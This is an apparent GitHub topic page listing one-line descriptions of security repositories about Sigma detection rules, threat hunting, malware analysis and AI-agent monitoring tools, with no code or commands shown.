A standalone SIGMA-based detection tool for EVTX, Auditd and Sysmon for Linux logs
-
Updated
May 30, 2026 - Python
A standalone SIGMA-based detection tool for EVTX, Auditd and Sysmon for Linux logs
Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.
Elemental - An ATT&CK Threat Library
Open detection standard -- like Sigma, but for AI agents. 425 rules, shipped in Microsoft AGT, Cisco AI Defense, MISP, OWASP A-S-R-H. 97.1% recall on NVIDIA garak. NIST OSCAL Path 1.
Mapping of open-source detection rules and atomic tests.
IOK (Indicator Of Kit) is an open source language and ruleset for detecting phishing threat actor tools and tactics
Resources To Learn And Understand SIGMA Rules
Local safety layer for AI agents that use the terminal. Screens risky commands and MCP/tool calls, watches Linux activity with eBPF, blocks dangerous behavior, and keeps audit trails local. Open source, self-hosted, dry-run by default.
BlackBerry Threat Research & Intelligence
A pySigma wrapper and langchain toolkit for automatic rule creation/translation
S2AN - Mapper of Sigma/Suricata Rules/Signatures ➡️ MITRE ATT&CK Navigator
Effort to list and aggregate known malicious Google Chrome Extension IDs
Sigma detection rules for hunting with the threathunting-keywords project
Open-source security platform for AI agents -- audits skills before install, monitors 24/7, shares threat intelligence across all users. | AI Agent 開源安全平台 -- 安裝前審計 skill、24/7 即時監控、社群共享威脅情報。
Complete Claude skills toolkit for professional malware analysis. 5 specialized skills covering triage, dynamic analysis, detection engineering, and reporting. Works with REMnux/FlareVM offline environments.
Open source HIDS tailored for Microsoft Windows and Active Directory
Framework definitions that allow to build a custom SIEM.
MCP server with 55 security intelligence tools — CVE/KEV, MITRE ATLAS+D3FEND, Sigma detection rules, email security posture (SPF/DMARC), domain & web intel, threat intel.
ESLint-style linter for Sigma detection rules. Validates against Sigma 2.1.0, scores rules across six quality dimensions, emits stable rule IDs.
CopyFail (CVE-2026-31431): Linux kernel page-cache PrivEsc PoC + the only public detection tool. Novel PAM auth-bypass vector + Sigma/auditd/eBPF rules.
Add a description, image, and links to the sigma-rules topic page so that developers can more easily learn about it.
To associate your repository with the sigma-rules topic, visit your repo's landing page and select "manage topics."